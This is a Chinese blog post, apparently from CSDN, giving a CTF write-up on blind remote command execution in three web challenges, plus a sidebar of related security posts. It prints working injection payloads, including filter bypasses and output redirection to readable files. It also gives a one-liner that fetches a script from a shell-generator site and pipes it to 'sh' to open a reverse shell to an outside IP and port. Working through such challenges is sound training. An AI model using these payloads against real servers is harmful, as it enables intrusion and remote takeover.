【Web】无回显RCE相关例题wp(1)

已于 2023-11-18 15:39:04 修改
阅读量563 收藏 11
点赞数 3
分类专栏: CTF题型总结例题篇 文章标签: 安全 CTF WEB
于 2023-11-13 14:46:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/134374495
版权

目录

①[SWPUCTF 2021 新生赛]finalrce

②[SWPUCTF 2023 秋季新生赛]RCE-PLUS

③[CTFSHOW]web807

这块还是很有嚼头的,准备分几次总结

命令执行无回显rce思路:

1.利用dnslog带外

2.写马

3.反弹shell

4.写文件然后访问文件

①[SWPUCTF 2021 新生赛]finalrce

 过滤了不少东西(其实不怕,关键词过滤\分割绕过不就行hhh)

最麻烦的exec命令执行是无回显的

用下面这种方法最省事:

command | tee file.txt

可以看到的是过滤了>,但没有过滤|,tee将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来看见命令执行的回显

payload:

?url=l\s / | tee 1.txt

访问1.txt

跟进

?url=tac /flllll\aaaaaaggggggg | tee 2.txt 

(因为la被过滤,仔细看哈)

访问2.txt

②[SWPUCTF 2023 秋季新生赛]RCE-PLUS

 shell_exec也无回显

waf把|和>都放出来了,用上题payload也可以打

我们这题就换个比较常见的>

payload:

?cmd=ls / > 2.txt

访问2.txt

 ?cmd=tac /f* > 2.txt 

访问2.txt

③[CTFSHOW]web807

 

 curl这是让我反弹shell了啊

推荐一个网站:https://your-shell.com/

傻瓜型反弹shell,我行你也行

payload:

?url=https://your-shell.com/124.222.136.33:1337 | sh 

(先在自己vps开启1337端口监听)

贴出执行:

Z3r4y
关注
专栏目录
Java-Rce-Echo:Java RCE回显测试代码
03-19
Java RCE回显 支持的回显测试代码 Linux通用回显 Windows通用回显 春天回显 Tomcat通用回显(已在6.0.10 / 6.0.53 / 7.0.34 / 7.0.54 / 7.0.70 / 7.0.96 / 7.0.104 / 8.0.18 / 8.0.32 / 8.0.48 / 8.5.12测试/...
WebSWPUCTF 2023 秋季新生 个人复现
uuzeray的博客
11-17 704
复现套新题试试
rce(无回显
qq_62046696的博客
07-20 4592
RCE英文全称分为远程命令执行ping和远程代码执行evel。漏洞出现的原因没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。...
【第58课】WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
最新发布
Lucker_YYY的博客
08-13 1675
​​​​​。
NSSCTF-[SWPUCTF 2023 秋季新生]-web
J1ng_Hong的博客
11-19 977
发现需要md5值相等,一开始想到的是:用0e开头的md5值为0进行比较,但是尝试了发现不行。用burp抓包看看信息,发现了每次买道具都是/buy/n,其中n是商品代号。然后我们直接在网页上payload,因为burp里payload发不出去了。但是由于if和else只能执行一个,而且$被ban了,所以a和b的值不能手动改。发现可以,然后需要蚁剑连接。进题是一个大卖场,我看了hint,发现给了一个username,以为是正常的sql注入,但是发现没有回显。然后把金额改成1元,买了flag然后去背包看看就行。
带外攻击(OOB)RCE回显思路总结详解
qq_71467825的博客
06-23 2474
向服务器提交一个payload,而服务器响应给我们相关的response信息,大家都叫他带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成。传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据。
rce回显剖析
姜小孩的博客
12-12 5260
ctf中,有时会遇到无回显rce,就是说虽然可以进行命令执行,但却看不到命令执行的结果,也不知道命令是否被执行,借着这次总结rce的机会,就把它一起总结了
回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
Python中getpass模块无回显输入源码解析
12-23
本文主要讨论了python中getpass模块的相关内容,具体如下。 getpass模块 昨天跟学弟吹牛b安利Python标准库官方文档的时候偶然发现了这个模块。仔细一看内容挺少的,只有两个主要api,就花了点时间阅读了一下源码,...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
091-从无回显命令执行到getshell的渗透测试.pdf
09-20
1. 远程命令执行漏洞的识别与利用:文章开始时提到,在一次渗透测试中,发现了一个PHPimap远程命令执行的漏洞点。这是一种常见的安全漏洞,允许攻击者远程执行服务器上的命令。但是,在这种情况下,执行命令后没有...
RCE篇之无回显rce
mingyqf的博客
01-13 1567
原文链接:http://arsenetang.com/2021/07/23/RCE%E7%AF%87%E4%B9%8B%E6%97%A0%E5%9B%9E%E6%98%BErce/
RCE回显漏洞利用
qq_32947907的博客
01-22 1236
除了上面的一些常见的方式以外,还有其它的如ICMP协议外带等等。参考链接带外攻击OOB(RCE回显骚思路总结)-腾讯云开发者社区-腾讯云不积跬步,无以至千里;不积小流,无以成江河。
[ctfshow web入门]常用姿势807-812
weixin_45751765的博客
04-15 2958
808 811 812
RCE绕过之无回显
Ciyaso的博客
07-23 3401
①shell_exec等无回显函数。 判断方法: ls;sleep(3) 利用: Ⅰ.复制,压缩,写shell等方法 copy flag.php flag.txt mv flag.php flag.txt cat flag.php > flag.txt Ⅱ.压缩方法 tar cvf flag.tar flag.php #tar压缩 tar zcvf flag.tar.gz flag.php #tar解压 zip flag.zip flag.php #zip压缩 unzip flag.
2023年SWPU NSS 秋季招新 (校外道)-没做出来的writeup
书山有路勤为径,学海无涯苦作舟
06-25 1030
第一个点,就是绕过第二个if,这里直接变量覆盖即可,当然GET和POST都发送wq是不行的,在POST中发送pucky即可。在进入unserialize之后,__wakeup()会进行赋值,如果molly===yuki那么即可得到flag。看来我们需要让wq等于二仙桥来进入第一个if语句,然后再绕过第二个if语句,进行反序列化。然后在反序列化的时候采取引用绕过的方式,exp如下。这题没啥可说了,反序列化之前也专门练过了。hint有提示备份文件,直接访问。看这个大佬的手工注入,nb呀。这个 dll 文件中。
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 1万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
ctfshow 常用姿势 801-827
blowed的博客
06-04 1957
主要是脚本 做法 基本上没原理
linux中的链接符号
m0_55754984的博客
09-13 664
1.每个命令之间用;隔开 说明:各命令的执行给果,不会影响其它命令的执行。换句话说,各个命令都会执行,但不保证每个命令都执行成功。 2.每个命令之间用&&隔开 说明:若前面的命令执行成功,才会去执行后面的命令。这样可以保证所有的命令执行完毕后,执行过程都是成功的。 3.每个命令之间用||隔开 说明:||是或的意思,只有前面的命令执行失败后才去执行下一条命令,直到执行成功一条命令为止。 4. | 是管道符号。管道符号改变标准输入的源或者是标准输出的目的地。 5. & 是后台任务符号。
sql注入成功数据无回显
07-25
SQL注入是一种黑客攻击手段,通过将恶意构造的SQL查询插入到输入字段中,攻击者可以获取敏感信息、篡改数据库内容或甚至获得对系统的访问权限。当存在SQL注入漏洞时,“数据无回显”通常指的是从数据库返回的结果并没有正常显示给用户。 这种现象可能发生在以下几个场景: ### 1. **结果未正确呈现** - 当用户输入的数据包含恶意SQL代码时,应用可能会尝试执行这些代码,而不是只处理表单中的实际数据。如果应用没有适当检查或过滤输入,并直接将用户提交的内容拼接到SQL查询字符串中,则可能导致整个查询被执行而不显示预期的结果页面或数据。 ### 2. **错误消息泄露信息** - 尽管最终结果可能没有如预期地展示出来,但是服务器仍然有可能生成并返回错误消息或状态码。例如,如果执行的SQL查询导致了一个语法错误,服务器会返回相应的错误信息(如“解析错误”、“行号列号信息”等),这实际上已经向攻击者透露了部分关于数据库结构的信息。 ### 3. **数据库特定响应** - 某些数据库系统或应用配置可能会在执行某些操作失败时返回特定的响应代码或错误信息,而这些信息对于理解查询意图是有帮助的,比如返回特定的状态代码表示查询超时或是数据量过大。 ### 4. **隐藏数据的特性** - 在一些情况下,应用的设计或框架可能会有意地隐藏数据回显的行为,尤其是在执行某些敏感操作时(例如删除数据、修改权限等)。这时,即使有数据操作发生,也可能不会在界面上显示任何反馈信息,使得外部观察者无法判断操作是否成功完成。 为了防止SQL注入成功导致数据无回显的问题,关键在于加强输入验证和清理、使用预编译语句(参数化查询)、限制数据库权限以及进行全面的安全审计和测试。这些措施可以帮助减少攻击面,确保应用程序能够安全地处理来自用户的输入,并有效防止潜在的SQL注入威胁。 --- ## 相关问题 - SQL注入: 1. **如何检测和预防SQL注入?** - 预编译语句、输入验证、最小权限原则、定期安全审核。 2. **SQL注入可能引发的具体风险有哪些?** - 数据泄露、系统控制权丢失、非授权访问等。 3. **为什么需要避免在SQL查询中直接拼接用户输入?** - 避免SQL注入攻击,保护系统免受恶意输入的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值